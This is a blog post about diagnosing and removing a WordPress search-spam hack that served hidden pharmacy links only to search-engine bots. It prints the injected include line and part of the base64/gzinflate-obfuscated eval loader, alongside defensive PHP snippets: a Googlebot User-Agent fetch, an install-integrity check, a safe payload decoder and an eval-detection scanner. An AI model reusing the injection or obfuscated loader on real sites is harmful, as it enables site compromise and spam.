WordPress Search Spam

A helpful article for all WordPress users from the National Law Review’s Business of Law weekly guest bloggers, Duo Consulting. Scott Frazer of Duo goes over a spam issue that affected Duo’s blog and explains in detail how they fixed the problem.

Our blog was recently affected by a rather clever little hack, and when I went searching for ways to remove it, I couldn’t find much. Here’s a brief writeup of what happened and how I fixed it.

Our Director of Internet Marketing Strategy, Sonny Cohen, spends some of his time searching Google and other search engines for keywords relevant to our business. He began noticing that some of those results, while they pointed to our blog, were laced with keywords and links to various male enhancement drugs. When I searched our blog for these references, I couldn’t find anything.

Here’s what I was seeing when I would search our blog for the phrase “test”:

But here’s what Google was seeing when it did the same search:

You may notice that the URL in that screenshot points to a local file. There are two ways you can see what your site looks like to Google. One is to change the User-Agent on your browser to match that of Googlebot. The other is to use the “Fetch as Googlebot” Labs utility in Google Webmaster Tools. I used the latter, saved the resulting report as an HTML file, and then opened that file in Chrome.
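The User-Agent approach can also be scripted. The following is a minimal sketch, not what I ran at the time: the function names and the browser User-Agent string are my own assumptions, and only the Googlebot string is the one Google publishes. Note that a cloaking script that also checks the visitor’s IP address may not be fooled by a spoofed User-Agent alone, so a matching result here does not prove the site is clean.

```php
<?php
// Hypothetical helpers for comparing what a "browser" and a "bot" are served.

const GOOGLEBOT_UA = 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)';
const BROWSER_UA   = 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0 Safari/537.36';

/** Build stream-context options that send the given User-Agent header. */
function ua_context_options(string $userAgent): array
{
    return ['http' => [
        'method'        => 'GET',
        'user_agent'    => $userAgent,
        'timeout'       => 10,
        'ignore_errors' => true, // still return the body on 4xx/5xx responses
    ]];
}

/** Fetch a URL while presenting the given User-Agent. Returns null on failure. */
function fetch_as(string $url, string $userAgent): ?string
{
    $context = stream_context_create(ua_context_options($userAgent));
    $body = @file_get_contents($url, false, $context);
    return $body === false ? null : $body;
}

/** Count anchor tags with an href: a crude signal for injected spam links. */
function count_links(string $html): int
{
    return (int) preg_match_all('/<a\s[^>]*href=/i', $html);
}

// Usage (placeholder URL; substitute your own search page):
//   $human = fetch_as('https://example.com/?s=test', BROWSER_UA);
//   $bot   = fetch_as('https://example.com/?s=test', GOOGLEBOT_UA);
//   if ($human !== null && $bot !== null) {
//       printf("links seen by browser: %d, by bot: %d\n",
//              count_links($human), count_links($bot));
//   }
```

A large difference in link counts between the two responses is a hint that something is serving bots different content, which is worth following up with the Webmaster Tools report.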

So why is Google seeing different results than anyone else who visits my site and runs that query? Something different must be happening when Google visits. I started running through the execution path of WordPress. The first file that is accessed is index.php. All this file does is turn on a theming variable and load wp-blog-header.php. So I moved on to that file. It looked like this:

if ( !isset($wp_did_header) ) {
    $wp_did_header = true;
    require_once( dirname(__FILE__) . '/temp.php' );
    require_once( dirname(__FILE__) . '/wp-load.php' );
    wp();
    require_once( ABSPATH . WPINC . '/template-loader.php' );
}

temp.php? Never heard of it, let’s see what’s inside:
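Spotting an unfamiliar file like this by eye works for a handful of files, but comparing the install against a freshly downloaded copy of the same WordPress version is more thorough. Here is a rough sketch of that idea; the function names and directory layout are assumptions of mine, not part of WordPress. Expect legitimate differences too, such as wp-config.php and everything under wp-content.

```php
<?php
/** Map every file under $dir to the SHA-1 of its contents, keyed by relative path. */
function hash_tree(string $dir): array
{
    $root = rtrim($dir, '/\\');
    $hashes = [];
    $iterator = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($iterator as $file) {
        if ($file->isFile()) {
            $relative = substr($file->getPathname(), strlen($root) + 1);
            $hashes[$relative] = sha1_file($file->getPathname());
        }
    }
    ksort($hashes);
    return $hashes;
}

/**
 * Compare a live install against a clean reference copy.
 * 'extra' lists files that exist only in the live install;
 * 'modified' lists files present in both whose contents differ.
 */
function compare_to_clean(string $installDir, string $cleanDir): array
{
    $installed = hash_tree($installDir);
    $clean     = hash_tree($cleanDir);

    $extra = array_keys(array_diff_key($installed, $clean));

    $modified = [];
    foreach (array_intersect_key($installed, $clean) as $path => $hash) {
        if ($hash !== $clean[$path]) {
            $modified[] = $path;
        }
    }
    return ['extra' => $extra, 'modified' => $modified];
}

// Usage (hypothetical paths):
//   print_r(compare_to_clean('/var/www/blog', '/tmp/wordpress-clean'));
```

In a case like ours, this would be expected to report temp.php as an extra file and wp-blog-header.php as modified.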

eval (gzinflate(base64_decode(
'vVhtc9pGEP6emfwHRfUUmGLg9IbkhNrUJrZnEsfFOGmKXc1ZOoMmQqInYYea/Pfu'
.'nnjRG6aZzNRj0Em7++yzu3erOw5/fXM4HU9fvnj5Ym8cRnFnz77q9T/2+sPK2WBw'
…snip for length…
.'6reTZEAXdDrl4QNzE/3F3Wy+iKjPxFe0gH7G+ML1IiecBfHiY+LyWLhsVmDlrQ7g'
.'cvonDPkW65UOKh6zCWuM44kvFr6Ialmvw1/fHP4L'
)));

Now that looks evil. Obfuscated code can’t be good. I decided to see what it does by replacing the “eval” with “print” and then I ran “php test.php” from that directory. The results are very long, but you can see them here.
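If you would rather not edit the suspicious file in place, the same decoding can be done from a separate script that never calls eval. This is a minimal sketch with a made-up function name; it assumes the payload uses the same base64 plus gzinflate wrapping shown above, and it only returns the hidden source as a string so you can read it.

```php
<?php
/**
 * Decode a base64 + raw-DEFLATE payload and return the hidden source as text.
 * Nothing is executed: the result is only a string to inspect.
 * Returns null if the input is not valid base64 or does not inflate.
 */
function decode_payload(string $encoded): ?string
{
    $compressed = base64_decode($encoded, true); // strict mode: false on invalid characters
    if ($compressed === false) {
        return null;
    }
    $source = @gzinflate($compressed); // suppress the warning on corrupt data
    return $source === false ? null : $source;
}

// Usage: paste the concatenated string from the suspicious file into $payload.
//   $payload = '...';
//   echo decode_payload($payload) ?? "could not decode\n";
```

Attackers sometimes nest several layers of encoding, so the output may itself contain another encoded string that needs the same treatment.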

Basically, the program tries to determine if we are a real person or a search engine bot by looking at things like our IP address and our user agent. If it determines we are human, it goes ahead and returns the standard header. If we’re a bot, it serves the content in “theme.html” which is identical to the second screenshot above.

So to clean things up, I removed the reference to temp.php from wp-blog-header.php, deleted the file temp.php and deleted the file theme.html.
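After a cleanup like this, it is worth checking that no other file carries a similar payload. The sketch below walks a directory and flags PHP files that contain an eval wrapped around a common decoding function. The function name and the list of decoders in the pattern are my own assumptions; a match is only a reason to look closer, and a determined attacker can obfuscate in ways this will miss.

```php
<?php
/**
 * Return the paths of .php files under $dir that contain an eval() call
 * wrapped directly around a common decoding function.
 */
function find_obfuscated_files(string $dir): array
{
    $pattern = '/eval\s*\(\s*(gzinflate|gzuncompress|str_rot13|base64_decode)\s*\(/i';
    $hits = [];
    $iterator = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($dir, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($iterator as $file) {
        // Only look at regular files with a .php extension.
        if (!$file->isFile() || strtolower($file->getExtension()) !== 'php') {
            continue;
        }
        $contents = file_get_contents($file->getPathname());
        if ($contents !== false && preg_match($pattern, $contents) === 1) {
            $hits[] = $file->getPathname();
        }
    }
    sort($hits);
    return $hits;
}

// Usage (hypothetical path):
//   foreach (find_obfuscated_files('/var/www/blog') as $path) {
//       echo "suspicious: $path\n";
//   }
```

Removing the files fixes the symptom but not the way the attacker got in, so changing passwords and updating WordPress and its plugins is a sensible follow-up.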

© 1999-2010 Duo Consulting

About the Author – Scott Frazer:

Scott supervises Duo’s network facilities, monitoring hardware and software, analyzing problems and ensuring that the network is fully operational. He works closely with clients to identify, interpret and evaluate their system requirements. He also provides the front-line defense of the Duo network by planning, coordinating and implementing network security measures. An avid Mac user, Scott is nonetheless happy to keep Duo’s servers running on Windows Server 2003 and Ubuntu Linux.

Scott has been working in network administration with Internet companies for over ten years. He has experience designing and maintaining networks and server farms for high-traffic sites in both the hosting and e-commerce arenas. As the senior system administrator for MusicToday, an online ticketing, merchandise and fan club portal, he was responsible for the stability and security of large-volume e-commerce sites, including websites for the Rolling Stones, the Grateful Dead and the Dave Matthews Band. www.duoconsulting.com / 312-529-3006

Published by

National Law Forum

A group of in-house attorneys developed the National Law Review on-line edition to create an easy-to-use resource to capture legal trends and news as they first start to emerge. We were looking for a better way to organize, vet and easily retrieve all the updates that were being sent to us on a daily basis. In the process, we’ve become one of the highest volume business law websites in the U.S. Today, the National Law Review’s seasoned editors screen and classify breaking news and analysis authored by recognized legal professionals and our own journalists. There is no log in to access the database and new articles are added hourly. The National Law Review revolutionized legal publication in 1888 and this cutting-edge tradition continues today.